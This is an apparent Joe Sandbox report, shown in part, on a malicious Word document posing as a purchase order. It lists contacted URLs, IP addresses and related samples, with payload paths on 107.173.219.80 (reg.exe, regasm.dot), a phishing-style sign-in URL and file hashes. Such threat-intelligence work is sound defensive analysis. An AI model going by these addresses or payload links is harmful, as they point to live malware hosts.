                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  107.173.219.80
                                                                                                                                                  unknownUnited States
                                                                                                                                                  36352AS-COLOCROSSINGUSfalse
                                                                                                                                                  185.255.55.12
                                                                                                                                                  u.nuNetherlands
                                                                                                                                                  3214XTOMxTomEUtrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:405914
                                                                                                                                                  Start date:06.05.2021
                                                                                                                                                  Start time:14:45:04
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 4s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Revised_PO_758869.docx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:24
                                                                                                                                                  Number of new started drivers analysed:1
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal64.evad.winDOCX@3/13@2/2
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .docx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.193.48, 168.61.161.212, 92.122.145.220, 52.109.88.177, 52.109.12.21, 52.109.12.24, 184.30.20.56, 20.50.102.62, 20.82.210.154, 92.122.213.194, 92.122.213.247, 20.54.26.129, 20.82.209.183
                                                                                                                                                  • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  107.173.219.80jt50apTCUS.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/prf/reg.dot
                                                                                                                                                  40HQ_of_CI_PL_SC_HR210503.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/prf/regasm.dot
                                                                                                                                                  40HQ_of_CI_PL_SC_HR210503.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/prf/regasm.dot
                                                                                                                                                  be1aca64_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/prf/reg.exe
                                                                                                                                                  2af49a1a_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/prf/reg.exe
                                                                                                                                                  parts number 2432647.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/gen/gen.dot
                                                                                                                                                  parts number 2432647.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/gen/gen.dot
                                                                                                                                                  2021_04 INV 20000652.pdf.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/
                                                                                                                                                  2021_04 INV 20000652.pdf.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/.---.-.-.-.-.-.--------------------------------------..--......
                                                                                                                                                  Ng21EqpaFI.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/sheng%20exe/reg.exe
                                                                                                                                                  INVOICE JPYE3EDDSE3E.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/
                                                                                                                                                  INVOICE JPYE3EDDSE3E.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/.-.-.-..........................................................................................-/
                                                                                                                                                  Payment INVOICE4552U224Y.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/
                                                                                                                                                  Payment INVOICE4552U224Y.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/.---.-.-.-.-.-.--------------------------------------..--....../
                                                                                                                                                  ACCOUNT SETTLED 32535365460.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/
                                                                                                                                                  ACCOUNT SETTLED 32535365460.docxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.80/-.......................................................................................................................-/
                                                                                                                                                  185.255.55.12Revised_PO_758869.docxGet hashmaliciousBrowse
                                                                                                                                                    jt50apTCUS.docxGet hashmaliciousBrowse
                                                                                                                                                      jt50apTCUS.docxGet hashmaliciousBrowse

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        u.nujt50apTCUS.docxGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        jt50apTCUS.docxGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        AS-COLOCROSSINGUS4139b8ab_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        83bf689e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        4bc3e123_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        0d09eead_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        3f9221b1_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        54ff5a30_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        41d135ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        4de517b8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        55a37e9d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        5753a308_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        71b5c408_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        3533a8d0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        6b23d8a9_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        223be7fa_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        52de79d7_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        8bbbadaf_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        ab7f8073_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        6208087a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        993e844c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        be6f73e7_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.227.10
                                                                                                                                                        XTOMxTomEURevised_PO_758869.docxGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        jt50apTCUS.docxGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        jt50apTCUS.docxGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        HdaPJuN3ad.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.80.191.125
                                                                                                                                                        hwtVPZ3Oeh.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.80.191.125
                                                                                                                                                        wGIJWTsyOY.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.80.191.125
                                                                                                                                                        printabledocx.dllGet hashmaliciousBrowse
                                                                                                                                                        • 147.78.176.27
                                                                                                                                                        http://78.142.194.53/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.co.jp%2F%3Fref_%3Dnav_em_hd_re_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=jpflex&openid.mode=checkid_setup&key=a@b.c&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&&ref_=nav_em_hd_clc_signinGet hashmaliciousBrowse
                                                                                                                                                        • 78.142.194.53
                                                                                                                                                        mIgJVcfrW2.exeGet hashmaliciousBrowse
                                                                                                                                                        • 147.78.176.27
                                                                                                                                                        redd.exeGet hashmaliciousBrowse
                                                                                                                                                        • 147.78.176.27
                                                                                                                                                        SecuriteInfo.com.UDS.DangerousObject.Multi.Generic.dllGet hashmaliciousBrowse
                                                                                                                                                        • 147.78.176.27
                                                                                                                                                        Invoice_050820.docGet hashmaliciousBrowse
                                                                                                                                                        • 147.78.176.27
                                                                                                                                                        9279cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29
                                                                                                                                                        9199cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29
                                                                                                                                                        9829cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29
                                                                                                                                                        6269cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29
                                                                                                                                                        9329cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29
                                                                                                                                                        6069cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29
                                                                                                                                                        5909cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29
                                                                                                                                                        8739cddst.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.29

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        ce5f3254611a8c095a3d821d44539877db8e6a08_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        viruss.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        4LIsYL2H6J.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        1v65bsIDAE.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        bb6fc5f4_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        bff1d0bc_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        f241f1c4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        qFhBOs5IMr.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        RW5h3IpKZl.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        jt50apTCUS.docxGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        Qau4wCF5R7.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        R65fnt33z7.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        8gaX0IZd8n.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        gkMZjaG2BV.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        AR5iTeR9za.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        j5Iw25ifjr.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        oUvjpbnwz3.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        KdLJVb0Aoi.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        iuCN1LJ980.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12
                                                                                                                                                        iwEcXUAues.dllGet hashmaliciousBrowse
                                                                                                                                                        • 185.255.55.12

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):626709
                                                                                                                                                        Entropy (8bit):0.5016908461527463
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:BLMJC08SFPfZ0jGBIRHF3W9wtZ1I1+hVZO4FqcerTU2fvlokfGTHi5U:BUC0HHZ+Pm9/WScUTzfvlok+TH+U
                                                                                                                                                        MD5:B9857F34BD0E9C109508A392A75E19F0
                                                                                                                                                        SHA1:30061185AEBCFEA6292F3D18F30B96729D5A220B
                                                                                                                                                        SHA-256:CF03E9237A923BB2282D4057B730D81A7606E474624FB805D65DC961BF698CA7
                                                                                                                                                        SHA-512:7470C636424BA89D9BDD0275993920267776BD5CC55B307964D52064F5974C01459B7CC3FB2A8289AB6064DA479AFD28E5E6F733E4C3D459A22B8816F69A6E16
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N.V.7.....(.1..`v9{6...UY.C...3..y[..|*..|.......$?..f_...$.g..'D...e....F.x....-b.T...4.0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):36
                                                                                                                                                        Entropy (8bit):2.730660070105504
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                        MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                        SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                        SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                        SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):64
                                                                                                                                                        Entropy (8bit):1.4172860556164644
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:SBAFHaV:SBAdu
                                                                                                                                                        MD5:E2D552BFC5CFDB85A8BF0C0D08949A26
                                                                                                                                                        SHA1:A8AF2A86B36C2417BB5967A2F9910D5CACD34D75
                                                                                                                                                        SHA-256:325BA757C01AA6207D750C4B5578C7C96905ABDE6DB70FCAE1173C46999646EF
                                                                                                                                                        SHA-512:E5D1EB7EC71694C66FDF771627BC7D8514F1308F77CD1FF3198BFD26C1FF30C1D300397CB1E8FDE17A72267D8BA2DADB800443E8F1B1E576EAF16B3719B3156E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: 302494. Admin.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A565DB19-BB03-40E7-A14A-DE7903488E69
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):134558
                                                                                                                                                        Entropy (8bit):5.368404449876619
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:hcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:eEQ9DQW+zPXO8
                                                                                                                                                        MD5:9B079FCF5D561CCA9ED3AF91AA532021
                                                                                                                                                        SHA1:5196E0BBC6CFBC7CFE85F07F8F24AC480808823E
                                                                                                                                                        SHA-256:BB97BB09A3DFD94AB296B0B8D78B597FD59897E719FC8316509FAFDDE10DF0FC
                                                                                                                                                        SHA-512:55ADA060C4E21B0EEFEE92F6C9E34CF1220A9A012A40D2CD1E597F9895C85AF969F8F7949E52827AC703097C88193A539DAD9369B50C5932C062062E4E234FD0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-06T12:45:58">.. Build: 16.0.14103.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{5205D5D0-81F4-4C10-B5A0-D79CED08A10B}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{EF9DD427-2917-4114-BC07-0ABF5A9DB55F}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:dBase III DBT, version number 0, next free block index 7536653
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.10581667566270775
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Ghl/dlYdn:Gh2n
                                                                                                                                                        MD5:28ADF62789FD86C3D04877B2D607E000
                                                                                                                                                        SHA1:A62F70A7B17863E69759A6720E75FC80E12B46E6
                                                                                                                                                        SHA-256:0877A3FC43A5F341429A26010BA4004162FA051783B31B8DD8056ECA046CF9E2
                                                                                                                                                        SHA-512:15C01B4AD2E173BAF8BF0FAE7455B4284267005E6E5302640AA8056075742E9B8A2004B8EB6200AA68564C40A2596C7600D426619A2AC832C64DB703A7F0360D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: ..s.d.f.s.f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\311s3[1].htm
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5
                                                                                                                                                        Entropy (8bit):1.5219280948873621
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:hn:h
                                                                                                                                                        MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                                                                                                                        SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                                                                                                                        SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                                                                                                                        SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview: 0....
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Revised_PO_758869.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:10 2020, mtime=Thu May 6 20:46:04 2021, atime=Thu May 6 20:45:55 2021, length=10323, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2200
                                                                                                                                                        Entropy (8bit):4.745888211855357
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:80KLxMd6jRKV5sQB6p0KLxMd6jRKV5sQB6:8UMcLKUMcL
                                                                                                                                                        MD5:9B9BD75D7CB8342A13AB728D4F063E15
                                                                                                                                                        SHA1:2D83682228CB116D6D6234F6A93A8CA4296496FA
                                                                                                                                                        SHA-256:0DF74DC94EE002FBA28D8166B747DEF20D9731843DD5AB0F715B59533DA1861F
                                                                                                                                                        SHA-512:7825D24DBEC6DDE97DE692D61808CA30C9BA9E3F520202632712F9C152C32119B6586905388064714998371F8A5715AE1EBEBD3769406BE080413EE3A94DB18D
                                                                                                                                                        Malicious:false
